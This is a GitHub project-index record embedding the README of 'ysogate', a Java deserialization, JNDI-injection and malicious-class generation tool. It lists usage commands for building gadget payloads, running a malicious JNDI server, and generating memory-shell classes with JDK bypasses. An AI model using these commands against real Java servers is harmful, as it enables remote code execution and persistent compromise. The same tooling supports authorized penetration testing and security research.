{"id":27211043,"url":"https://github.com/h4cking2thegate/ysogate","last_synced_at":"2025-08-19T01:08:04.883Z","repository":{"id":202801385,"uuid":"708080877","full_name":"H4cking2theGate/ysogate","owner":"H4cking2theGate","description":"Java反序列化/JNDI注入/恶意类生成工具，支持多种高版本bypass，支持回显/内存马等多种扩展利用。","archived":false,"fork":false,"pushed_at":"2025-08-06T09:03:35.000Z","size":278,"stargazers_count":112,"open_issues_count":0,"forks_count":11,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-08-06T11:16:43.222Z","etag":null,"topics":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/H4cking2theGate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-21T13:20:19.000Z","updated_at":"2025-08-06T09:03:39.000Z","dependencies_parsed_at":null,"dependency_job_id":"ea385061-d422-4f09-ad1d-952d7d7ade74","html_url":"https://github.com/H4cking2theGate/ysogate","commit_stats":null,"previous_names":["h4cking2thegate/ysogate"],"tags_count":9,"template":false,"template_full_name":null,"purl":"pkg:github/H4cking2theGate/ysogate","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/releases","manifests_url":"https://repos.ec
osyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/H4cking2theGate","download_url":"https://codeload.github.com/H4cking2theGate/ysogate/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271083699,"owners_count":24696350,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-18T02:00:08.743Z","response_time":89,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"created_at":"2025-04-10T01:28:15.399Z","updated_at":"2025-08-19T01:08:04.859Z","avatar_url":"https://github.com/H4cking2theGate.png","language":"Java","readme":"# ysogate\n\nysogate is a comprehensive Java exploitation tool. It supports JNDI injection exploitation, includes multiple bypass techniques for newer JDK versions, and supports fragmented gadget generation and composition.\n\n- Generates a variety of Java deserialization gadget payloads\n- Supports multiple exploitation methods such as JNDI/LDAP/RMI/JRMP\n- Flexible command-line interface with multiple operation modes\n- Extensible architecture that makes it easy to add new gadgets and attack vectors\n- Supports multiple bypass techniques for newer JDK versions\n- Supports extended exploitation methods such as memory shells, response echo, and proxies\n\n## Usage\n\nThere are two modes: specify `-m jndi` to start the JNDI Server, specify `-m payload` to generate a deserialization payload, and specify `-m gen` to generate a malicious class\n\n```bash\n[root]#~  H4cking to the Gate !\n[root]#~  Usage:\n[root]#~  Payload Mode: java -jar ysogate-[version]-all.jar -m payload [PAYLOAD OPTIONS]\n[root]#~  JNDI    Mode: 
java -jar ysogate-[version]-all.jar -m jndi    [JNDI OPTIONS]\n[root]#~  Gen     Mode: java -jar ysogate-[version]-all.jar -m gen     [GEN OPTIONS]\n```\n## Payload Mode\nUse `-m payload` to select payload mode, which generates a custom deserialization payload\n\nFor example, to output a base64-encoded payload:\n\n```\njava -jar ysogate-[version]-all.jar -m payload -g Jackson1 -p calc -b64\n```\nUse `-ol` to output overlong UTF-8 encoding\n```\n-m payload -g Jackson1 -p calc -b64 -ol\n```\nNewly added SpringAOP gadget chains\n```\n# Load bytecode\n-m payload -g SpringAOPWithTemplates -p \"notepad\" -b64\n# Load XML\n-m payload -g SpringAOPWithXml -p \"http://127.0.0.1:8000/666\" -b64\n# Write file\n-m payload -g SpringAOPWithFileWrite -p \"/tmp/evil.xml;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\" -b64\n```\n\nFor more usage, see [PayloadMode](docs/PayloadMode.md)\n## JNDI Mode\nUse `-m jndi` to select JNDI mode, which runs a malicious JNDI server locally\n\n```\n[root]#~  JNDI Mode Options:\n -h,--help              Show help message\n -hp,--httpPort \u003carg\u003e   HTTP port\n -i,--ip \u003carg\u003e          IP address for JNDI server\n -ldap2rmi              change ldap to rmi to bypass trustSerialData\n -lp,--ldapPort \u003carg\u003e   LDAP port\n -m,--mode \u003carg\u003e        Operation mode: 'payload' or 'jndi' or 'gen'\n -onlyRef               use Reference only to bypass trustSerialData\n -rp,--rmiPort \u003carg\u003e    RMI port\n```\n\nFor example:\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -onlyRef\n```\nFor more usage, see [JNDIMode](docs/JNDIMode.md)\n## Gen Mode\nUse `-m gen` to select gen mode, which generates malicious classes\n\n```\n[root]#~  Gen Mode Options:\n -bypass                   ByPass JDK Module\n -f,--format \u003carg\u003e         Output format\n -h,--help                 Show help message\n -m,--mode \u003carg\u003e           Operation mode: 'payload' or 'jndi' or 'gen'\n -name,--classname \u003carg\u003e   Evil Class Name\n -s,--sink \u003carg\u003e           Evil sink template\n -t,--type \u003carg\u003e           Middleware type\n```\n\nExample: generate a Spring MVC command-execution class with response echo; adding -bypass bypasses the restrictions of newer JDK versions and works on JDK 17\n\n```\njava -jar 
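ysogate-[version]-all.jar -m gen -t springmvc -s CmdExec -name org.springframework.expression.Evil -bypass\n```\nFor more usage, see [GenMode](docs/GenMode.md)\n## Todo\n- [x] Basic deserialization payload generation\n- [x] Add JNDI/LDAP/RMI/JRMP exploitation methods\n- [x] Bypass trustSerialData\n- [x] Improve gadgets for third-party libraries\n- [x] Add middleware response echo\n- [x] Add extended attacks for bytecode loading, such as response echo, memory shells, and proxies\n- [ ] Add RMI deserialization exploitation\n- [x] Additional defense bypasses, adding OverlongUTF8 / dirty-data bypasses\n- [ ] Improve deserialization reverse shell\n- [ ] LDAPS protocol support\n\n\n\n## Disclaimer\nThis project is intended solely for security research and learning; any illegal use is prohibited\n\nIf you engage in any illegal activity while using this project, you bear the resulting consequences yourself\n\nUnless you have fully read, completely understood, and accepted this agreement, please do not use this project\n\n\n\n## Reference\n\n - https://github.com/frohoff/ysoserial\n - https://github.com/X1r0z/JNDIMap\n - https://tttang.com/archive/1405/","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fh4cking2thegate%2Fysogate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fh4cking2thegate%2Fysogate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fh4cking2thegate%2Fysogate/lists"}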